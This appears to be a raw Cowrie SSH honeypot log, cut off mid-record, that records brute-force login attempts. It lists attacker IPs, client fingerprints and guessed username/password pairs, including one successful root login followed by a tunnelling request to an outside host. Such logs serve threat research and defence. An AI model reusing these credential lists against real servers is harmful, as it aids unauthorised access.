{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:33:22.300101Z","src_ip":"51.250.72.176","session":"b389b1ea596f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:33:22.339956Z","src_ip":"51.250.72.176","session":"b389b1ea596f"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":40418,"dst_ip":"1.2.3.4","dst_port":22,"session":"eab28a71054b","protocol":"ssh","message":"New connection: 43.156.132.147:40418 (1.2.3.4:22) [session: eab28a71054b]","sensor":"my-vps","timestamp":"2025-09-09T00:33:22.350490Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:33:22.351348Z","src_ip":"43.156.132.147","session":"eab28a71054b"}
{"eventid":"cowrie.login.failed","username":"redis","password":"Password","message":"login attempt [redis/Password] failed","sensor":"my-vps","timestamp":"2025-09-09T00:33:22.540727Z","src_ip":"51.250.72.176","session":"b389b1ea596f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:33:22.595643Z","src_ip":"43.156.132.147","session":"eab28a71054b"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:33:23.581763Z","src_ip":"51.250.72.176","session":"b389b1ea596f"}
{"eventid":"cowrie.login.failed","username":"ahmed","password":"1234567","message":"login attempt [ahmed/1234567] failed","sensor":"my-vps","timestamp":"2025-09-09T00:33:23.615799Z","src_ip":"43.156.132.147","session":"eab28a71054b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47568,"dst_ip":"1.2.3.4","dst_port":22,"session":"471d56ffb4d1","protocol":"ssh","message":"New connection: 212.227.125.160:47568 (1.2.3.4:22) [session: 471d56ffb4d1]","sensor":"my-vps","timestamp":"2025-09-09T00:33:23.972987Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T00:33:23.973806Z","src_ip":"212.227.125.160","session":"471d56ffb4d1"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-09T00:33:24.124067Z","src_ip":"212.227.125.160","session":"471d56ffb4d1"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:33:24.861933Z","src_ip":"43.156.132.147","session":"eab28a71054b"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:33:33.974421Z","src_ip":"212.227.125.160","session":"471d56ffb4d1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34578,"dst_ip":"1.2.3.4","dst_port":22,"session":"5baddc4fe7a9","protocol":"ssh","message":"New connection: 212.227.235.229:34578 (1.2.3.4:22) [session: 5baddc4fe7a9]","sensor":"my-vps","timestamp":"2025-09-09T00:33:38.783121Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T00:33:38.784163Z","src_ip":"212.227.235.229","session":"5baddc4fe7a9"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-09T00:33:38.977451Z","src_ip":"212.227.235.229","session":"5baddc4fe7a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":27702,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3a3070757a8","protocol":"ssh","message":"New connection: 212.227.125.160:27702 (1.2.3.4:22) [session: c3a3070757a8]","sensor":"my-vps","timestamp":"2025-09-09T00:33:40.466654Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:33:40.468013Z","src_ip":"212.227.125.160","session":"c3a3070757a8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":27967,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a79a02930e1","protocol":"ssh","message":"New connection: 212.227.125.160:27967 (1.2.3.4:22) [session: 7a79a02930e1]","sensor":"my-vps","timestamp":"2025-09-09T00:33:40.579700Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T00:33:40.580722Z","src_ip":"212.227.125.160","session":"7a79a02930e1"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-09T00:33:40.694320Z","src_ip":"212.227.125.160","session":"7a79a02930e1"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:33:41.036911Z","src_ip":"212.227.125.160","session":"7a79a02930e1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-09T00:33:41.151517Z","session":"7a79a02930e1"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:33:48.783162Z","src_ip":"212.227.235.229","session":"5baddc4fe7a9"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":36660,"dst_ip":"1.2.3.4","dst_port":22,"session":"45c0f7f13e46","protocol":"ssh","message":"New connection: 152.32.129.236:36660 (1.2.3.4:22) [session: 45c0f7f13e46]","sensor":"my-vps","timestamp":"2025-09-09T00:33:51.961089Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:33:51.961961Z","src_ip":"152.32.129.236","session":"45c0f7f13e46"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:33:52.802075Z","src_ip":"152.32.129.236","session":"45c0f7f13e46"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":54475,"dst_ip":"1.2.3.4","dst_port":22,"session":"0fa6641db0da","protocol":"ssh","message":"New connection: 103.100.209.195:54475 (1.2.3.4:22) [session: 0fa6641db0da]","sensor":"my-vps","timestamp":"2025-09-09T00:33:53.351531Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:33:53.357239Z","src_ip":"103.100.209.195","session":"0fa6641db0da"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:33:53.557914Z","src_ip":"103.100.209.195","session":"0fa6641db0da"}
{"eventid":"cowrie.login.failed","username":"master","password":"pass","message":"login attempt [master/pass] failed","sensor":"my-vps","timestamp":"2025-09-09T00:33:53.657831Z","src_ip":"152.32.129.236","session":"45c0f7f13e46"}
{"eventid":"cowrie.login.failed","username":"app","password":"123","message":"login attempt [app/123] failed","sensor":"my-vps","timestamp":"2025-09-09T00:33:54.364734Z","src_ip":"103.100.209.195","session":"0fa6641db0da"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:33:54.863475Z","src_ip":"152.32.129.236","session":"45c0f7f13e46"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:33:55.569265Z","src_ip":"103.100.209.195","session":"0fa6641db0da"}
{"eventid":"cowrie.session.connect","src_ip":"51.250.72.176","src_port":58396,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9a911da5033","protocol":"ssh","message":"New connection: 51.250.72.176:58396 (1.2.3.4:22) [session: d9a911da5033]","sensor":"my-vps","timestamp":"2025-09-09T00:34:23.561230Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:34:23.561866Z","src_ip":"51.250.72.176","session":"d9a911da5033"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:34:23.592943Z","src_ip":"51.250.72.176","session":"d9a911da5033"}
{"eventid":"cowrie.login.failed","username":"john","password":"1","message":"login attempt [john/1] failed","sensor":"my-vps","timestamp":"2025-09-09T00:34:23.757215Z","src_ip":"51.250.72.176","session":"d9a911da5033"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:34:24.790159Z","src_ip":"51.250.72.176","session":"d9a911da5033"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":42260,"dst_ip":"1.2.3.4","dst_port":22,"session":"3bd80a7846f1","protocol":"ssh","message":"New connection: 43.156.132.147:42260 (1.2.3.4:22) [session: 3bd80a7846f1]","sensor":"my-vps","timestamp":"2025-09-09T00:34:32.671103Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:34:32.672218Z","src_ip":"43.156.132.147","session":"3bd80a7846f1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35772,"dst_ip":"1.2.3.4","dst_port":22,"session":"753848dccb62","protocol":"ssh","message":"New connection: 212.227.125.160:35772 (1.2.3.4:22) [session: 753848dccb62]","sensor":"my-vps","timestamp":"2025-09-09T00:34:32.731204Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003~\\xf6\\xbc\\x83\\xf2\\xe0$\\x9dj\\x8f\\xb9~\\xc4\\xea\u0006\\xd5\u0004\\xb0e\\xbe\u0016\\xfe\\xed","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003~\\xf6\\xbc\\x83\\xf2\\xe0$\\x9dj\\x8f\\xb9~\\xc4\\xea\u0006\\xd5\u0004\\xb0e\\xbe\u0016\\xfe\\xed","sensor":"my-vps","timestamp":"2025-09-09T00:34:32.731973Z","src_ip":"212.227.125.160","session":"753848dccb62"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:34:32.732842Z","src_ip":"212.227.125.160","session":"753848dccb62"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:34:32.925346Z","src_ip":"43.156.132.147","session":"3bd80a7846f1"}
{"eventid":"cowrie.login.failed","username":"testserver","password":"password123","message":"login attempt [testserver/password123] failed","sensor":"my-vps","timestamp":"2025-09-09T00:34:33.979408Z","src_ip":"43.156.132.147","session":"3bd80a7846f1"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":52720,"dst_ip":"1.2.3.4","dst_port":22,"session":"45c466248f6b","protocol":"ssh","message":"New connection: 5.202.105.236:52720 (1.2.3.4:22) [session: 45c466248f6b]","sensor":"my-vps","timestamp":"2025-09-09T00:34:34.286411Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:34:34.307543Z","src_ip":"5.202.105.236","session":"45c466248f6b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh 